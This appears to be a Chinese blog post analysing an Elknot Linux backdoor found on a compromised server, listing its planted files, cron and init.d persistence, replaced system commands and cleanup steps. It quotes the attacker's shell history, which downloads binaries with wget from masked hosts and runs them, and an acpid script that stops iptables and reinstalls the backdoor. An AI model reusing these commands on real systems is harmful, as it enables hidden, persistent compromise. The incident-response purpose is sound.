linux恶意样本-我是壮丁
2016-03-13 15:12
495 查看
今天看到drops,有白帽子发了一份服务器发现问题处理的一个过程主机被入侵分析过程报告
曾经也处理过类似的,应该是一个家族的,就发出来吧。
样本应该存留了,等我找到放到哪里了再发出来。。。
曾经也处理过类似的,应该是一个家族的,就发出来吧。
0x00:后门名称 Unix.Trojan.Elknot 0x01:后门行为 1.在 /mnt 目目录下放置多个后门程序,并运行行,主要程序有:conf.n、iptv、rc.loca3、rc.loca4 等 2.在 /tmp 目目录下放置多个后门程序,并运行行,主要程序有:Internet、2868等 3.在 /etc/cron.hourly/ 目录下放置后门脚本,同时添加启动任务到/etc/crontab 中,每半三分钟执行行一一次 /etc/crontab */3 * * * * root /etc/cron.hourly/udev.sh cat /etc/cron.hourly/udev.sh #!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin cp /lib/libgcc4.so /lib/libgcc4.4.so /lib/libgcc4.4.so 4.添加多个服务,并设置开机启动,主要服务有:selinux、DbSecuritySpt等 (/etc/init.d/中会随机的生成一个启动脚本,需要人工识别) [root@ init.d]# cat selinux #!/bin/bash /usr/bin/bsd-port/getty [root@init.d]# cat DbSecuritySpt #!/bin/bash /root/Internet 随机的程序有时存在,有时不存在,需要人工识别 5.在 /usr/bin/bsd-port/ 放置后门程序 getty,并执行行 6.在 /usr/bin/dbus 目目录放置后门 dbus-daemon-draw,该脚本程序通过服务执行行 7.在 /usr/bin 目目录下放置 .ssh、bin2、newnode 程序并执行行 8.在 /usr/bin 目目录下放置 acpid、.zip.swp 后门程序 acpid部分shell脚本 service iptables stop 1>/dev/null 2>/dev/null while true; do if [ -x $binary ];then sleep 1 else if [ -x /usr/bin/.zip.swp ];then echo y|cp /usr/bin/.zip.swp $binary 2>/dev/null chmod a+x $binary else echo y|cp /usr/share/man/man3/ast.gz $binary 2>/dev/null chmod a+x $binary fimv ast fi "acpid" 36L, 572C 9.在 /usr/share/man/man3 放置 ast.gz 后门程序 10.替换 ps、netstat、lsof、ss 四个系统命令为后门程序 (被替换的命令存放在/usr/bin/dpkgd) 其中所有后门程序的MD5值相同(包含被替换的命令) [root@www ~]# md5sum Internet 76aa5297ed2d046d3e618f0228aaf0a9 Internet [root@www ~]# md5sum /bin/ps 76aa5297ed2d046d3e618f0228aaf0a9 /bin/ps [root@www ~]# md5sum /usr/bin/.sshd 76aa5297ed2d046d3e618f0228aaf0a9 /usr/bin/.sshd 11.后门运行后会在/tmp目录下产生以下文件 gates.lod,moni.lod等文件 0x02:种植后门的操作(history) 968 w 969 ifconfig 970 ethtool eth0 971 cd /mnt 972 wget http://1x.x29.x32.1x0:10089/Systenm 973 chmod +x Systenm 974 ./Systenm & 975 w 976 last 977 wget http://18x.13x.21x.20x:8050/rc.loca3 978 chmod 0755 /mnt/rc.loca3 979 nohup /mnt/rc.loca3 > /dev/null 2>&1 & 980 w 981 04:48:18 exit 982 cd /tmp 983 chmod +x Internet 984 ./Internet & 985 chmod +x 2868 986 ./2868 & 0x03:后门清除&&后续处理 1.删除crontab里面的内容 2.还原系统替换的命令 3.Kill已经在运行的进程 4.删除启动项中的脚本(/etc/init.d/和/etc/rc*.d里面的东西) 5.清除/tmp,/mnt,/usr/bin/等目录中的文件 6.备份数据后重装系统 7.排查其他机器
样本应该存留了,等我找到放到哪里了再发出来。。。
相关文章推荐
- Linux内核及分析 第三周 Linux内核的启动过程
- Arch Linux 安装过程
- centos 7的用户和权限管理相关内容
- linux内存源码分析 - 内存池
- Linux内核分析课程实验三:跟踪分析Linux内核的启动过程
- Linux关于文件加密的两种方法和详解
- 20135201李辰希《Linux内核分析》第三次 构造一个简单的Linux系统OS
- /usr/include/linux/input.h 中部分按键与KEY值对应关系
- Linux 的启动流程
- linux下安装boost
- 浅析linux下core文件及调试
- Linux笔记(28)——ip地址配置
- GNU/Linux下用户、组及权限管理
- LINUX和UNIX的关系是什么?
- Linux文本处理三剑客之grep
- 解决 Linux 终端 wget 命令下载jdk的问题,jdk在linux下的配置问题
- linux内核分析学习笔记:用gdb跟踪linux内核启动过程
- linux下解压缩jar包
- Linux内核分析——构造一个简单的Linux系统MenuOS
- 《linux内核与分析》第三周